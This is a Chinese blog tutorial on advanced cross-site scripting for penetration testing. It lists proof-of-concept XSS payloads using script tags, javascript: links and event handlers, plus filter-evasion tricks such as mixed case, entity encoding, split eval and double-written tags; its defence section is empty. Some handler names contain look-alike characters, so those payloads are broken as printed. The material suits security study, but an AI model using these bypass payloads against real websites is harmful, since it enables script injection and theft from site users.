渗透测试实例指南--XSS进阶

最新推荐文章于 2023-07-05 16:38:12 发布
最新推荐文章于 2023-07-05 16:38:12 发布
阅读量272 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37051023/article/details/109438257
版权

1、XSS构造方法

       1.1 利用<>构造HTML标签和<script>

             例如:<script>alert(/xss/)</script>

             <script>confirm("完成的不错!")</script>

             <script>prompt("完成的不错!")</script>
             <script>alert("完成的不错!")</script>

       1.2 伪协议  javascript:alert(/xss/)

             例如:<a href="javascript:alert(/xss/)">touch me!</a>,通过href是创建一个超链接,点击超链接,触发xss

       1.3 产生自己的事件

        “事件驱动”是一种比较经典的编程思想,在网页中会发生很多事件(例如鼠标移动,键盘输入等),JS可以对这些事件进行相应,所以我们可以通过事件触发JS函数,触发xss

        事件种类:

        windows事件  -------对windows对象触发事件

        Form事件  -------HTML表单内的动作触发事件

        Keyboard事件  -------键盘按键

        Mouse事件  -------由鼠标或类型用户动作触发事件

        Media事件  -------由多媒体触发事件

       <img src='./smile.jpg'> οnmοuseοver='alert(/xss/)'---这个标签会引入一个图片,然后鼠标悬停在图片上的时候,会触发XSS代码

        <input type="text"  οnkeydοwn="alert(/xss/)">---当点击键盘任意一个按键的时候触发xss

        <input type="text"  οnkeyup="alert(/xss/)">

        <input type="button"  οnclick="alert(/xss/)">

        <img src="#"  οnerrοr='alert(/xss/)'>

      1.4 其他标签以及手法

           <input οnfοcus=alert(/xss/)  autofocus>

2、XSS变形

       2.1  大小写

           <a hREf="javascript:alert(/xss/)">touch me!</a>        (alert属于js函数,不可以大小写,href属于html语言,html对大小写不明感)

       2.2   引号的使用

         <img src="#" οnerrοr="alert(/xss/)" />-----双引号

         <img src='#' οnerrοr='alert(/xss/)' />-----单引号

         <img src=# οnerrοr=alert(/xss/) />-----无引号

       2.3  [/]代替空格

         <img/src='#'/οnerrοr='alert(/xss/)' />

       2.4  回车/TAB

           方法一:<a hREf="j

           avascript:alert(/xss/)">touch me!</a> 

           方法二

           <a hREf="j

           a    v

           a    s

           c     r

           i      p

           t      :

           alert(/xss/)">touch me!</a> 

       2.5  编码

           字母    ASCII     十进制   十六进制

            a          97        &#97;       &#x61;

          <a hREf="j&#97;v&#97;script:alert(/xss/)">touch me!</a> 

       2.5  拆分跨站

           <script>z='alert'</script>

          <script>z=a+'(/xss/)'</script>

          <script>eval(z)</script>

       2.5  双写绕过

           <script>

           <scr<script>ipt>

3、XSS防御

qq_37051023
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Metasploit渗透测试进阶
煮酒闲谈
09-21 1267
Metasploit渗透测试进阶】摘要 记录一次完整的Metasploit测试!利用漏洞MS12-004 工具 : Metasploit Feamwork Netcat Let’s Go!【漏洞查证】!1:控制台执行 msfconsole 启动Metasploit :>>> msfconsole 2:输入命令 search ms12_004,我们来找找ms12-004漏洞的
渗透实例】记录一次XSS渗透过程
TeamsSix 的 CSDN 空间
07-03 2358
0x01 找到存在XSS的位置 没什么技巧,见到框就X,功夫不负有心人,在目标网站编辑收货地址处发现了存在XSS的地方,没想到这种大公司还会存在XSS。 [外链图片转存失败(img-qUL3DxC1-1562166261579)(https://mp.csdn.net/mdeditor/1)] 0x02 构造XSS代码连接到XSS平台 XSS平台给我们的XSS代码是这样的: </tExt...
xss简单渗透测试
weixin_30244889的博客
02-14 185
xss简单渗透测试 xss简单渗透测试 Write by admin in未分类at 2009-07-27 11:13:24 xss简单渗透测试 Author: jianxin [80sec]EMail: jianxin#80sec.comSite: http://www.80sec.comDate: 2008-12-24From:http://w...
Powershell渗透测试系列-进阶
程序员二黑
02-01 656
经过基础篇的学习我们已经对powershell有了一个基本的了解,接下来我们先补充一点基础知识然后就尝试去分析nishang中的优秀代码学会如何去使用脚本最后实战 。预告一下,第三篇高级篇带你使用powershell遨游内网。
黑客进阶之路:渗透测试学习指南
Hacker0830的博客
05-08 794
在网络安全领域,渗透测试是一个非常重要的技术。渗透测试是一种对计算机系统、应用程序和网络进行安全评估的方法,旨在发现潜在的漏洞和安全风险,以此来提高系统的安全性。我将为初学者提供入门渗透测试的学习路线和规划,并且介绍一些常用的渗透测试方法和工具,以及推荐一些学习资料。入门渗透测试需要掌握的知识和技能非常丰富,需要不断的学习和实践。通过文章的学习路线和规划,初学者可以有一个明确的学习方向,并且可以系统地学习渗透测试的方法和工具。同时,也提供了一些优秀的学习资料,帮助大家更快地入门渗透测试。t=N3I4。
WEB渗透学习-XSS-labs靶场
04-20
**XSS(跨站脚本攻击)学习指南XSS-labs靶场详解** XSS,全称为Cross-Site Scripting,是网络安全领域常见的漏洞类型之一。它允许攻击者通过注入恶意脚本到Web页面中,进而对用户浏览器进行操控。XSS-labs是一个...
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
【推荐】渗透测试工程师(CISP-PTE)认证培训课件资料合集(18份).zip
11-29
推荐,注册信息安全专业人员渗透测试工程师(CISP-PTE)认证培训课件资料合集,共18份。 001-Linux操作系统安全V2.0.pptx 002-Windows操作系统安全V2.0.pptx 003-数据库安全.pptx 004-Web安全基础0 - 介绍.pptx 005...
CISP-PTE注册信息安全专业人员渗透测试工程师-认证课件资料
最新发布
01-30
CISP-PTE注册信息安全专业人员渗透测试工程师-认证课件资料:2个版本,共25个课件文件 01.WEB安全简介 02.信息收集 03.漏洞扫描 04.HTTP协议 05.SQL注入之基础篇 07.暴力破解 08.文件上传漏洞 09.命令执行漏洞 10....
渗透测试实例指南--XSS
qq_37051023的博客
07-30 199
概要:XSS--跨站脚本攻击,Cross-Site Scripting,属于代码注入攻击的一种,针对网站应用程序的安全漏洞攻击技术。它允许恶意用户将代码注入到网页,其他用户浏览器此页面时会受到影响,一旦攻击成功,则可能获取较高权限、私密网页内容、会话和cookie等内容。 XSS攻击分为三种方式:反射型XSS、存储型XSS、DOM型XSS。 反射型:攻击者利用电子邮件或其他方式将包含XSS代码的恶意链接发送给目标用户,目标用户点击或浏览此链接后,会访问到某服务器,服务器接收到请求后,将带有XSS代码的数
web安全-进阶渗透
Coisini的博客
05-27 646
微信翻译或者百度翻译/谷歌都可以
渗透测试零基础入门到精通成长之路
z099164的博客
03-25 255
渗透测试零基础入门到精通成长之路
渗透测试的各个阶段
xv66666的博客
07-05 391
执行摘要是对测试目标和调查结果的高度总结。它主要面向那些负责信息安全计划的主管人员。执行摘要通常由一下几个方面构成。1、背景介绍(background):测试人员不仅要在“背景介绍”中记录此次测试的实际目的,而且还要向管理人员介绍哪些他们不常接触的技术术语。诸如:“漏洞”和“对策”之类的专业术语,都应当再次进行书面说明。2、整体评估(overall posture):各类问题的高度总结。
视频教程-Kali Linux渗透测试进阶提升及其实战教程-渗透测试
weixin_33744389的博客
05-28 554
Kali Linux渗透测试进阶提升及其实战教程 本人有多年的服务器高级运维...
渗透测试学习1--Windows篇
qq_37382081的博客
05-10 473
一些Dos命令:net use k:\\(对方的ip地址)\c$将对方的C盘复制到本地取名为knet use k:\\(ip地址)\c$/del删除k盘简单的整人代码:shutdown -s -t 60 -c"hacked by Remiliia"弹出对话框,显示引号里面的内容,并且与60秒后关机,如果是重启将-s 改为 -rnet start XX  开启XX服务net stop XX  停止X...
渗透测试学习之路参照
渗透、攻防、CTF、编程
06-24 1055
表格 1     教学阶段 日期   知识点 实验环境1 实验环境2 实验环境3 综合练习 综合场景实战 相关学习内容 基础能力 第 1 周 1 Li...
渗透测试入门16之渗透测试基本知识
鹿鸣天涯
04-04 576
进程:进程是程序在计算机上的一次执行活动,当运行一个程序时就启动一个进程。程序是静态的,进程是动态的。进程分为系统进程和用户进程。 管理进程的方法: 1、系统自带的任务管理器 2、Windows进程管理器(可对进程进行查询、管理、端口访问查询、系统性能/信息查询) 端口:计算机与外界通讯交流的出口,分为硬件端口、软件端口和协议端口。 硬件端口又称接口,eg:USB接口,串行端口。 ...
渗透测试如何入门?
jklbnm12的博客
12-04 727
渗透测试是什么? 渗透测试(penetrationtest)并没有一个标准的定义,国外一些安全组织达成共识的通用说法是:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。 这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞。 换句话来说,渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交
-xmx -xms -xmn -xss
07-08
- -Xmx:指定 JVM 的最大堆内存大小,用于存放对象实例和数组。例如,-Xmx2g 将最大堆内存设置为 2GB。 - -Xms:指定 JVM 的初始堆内存大小,也是堆内存的最小值。例如,-Xms256m 将初始堆内存设置为 256MB。 - -Xmn...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值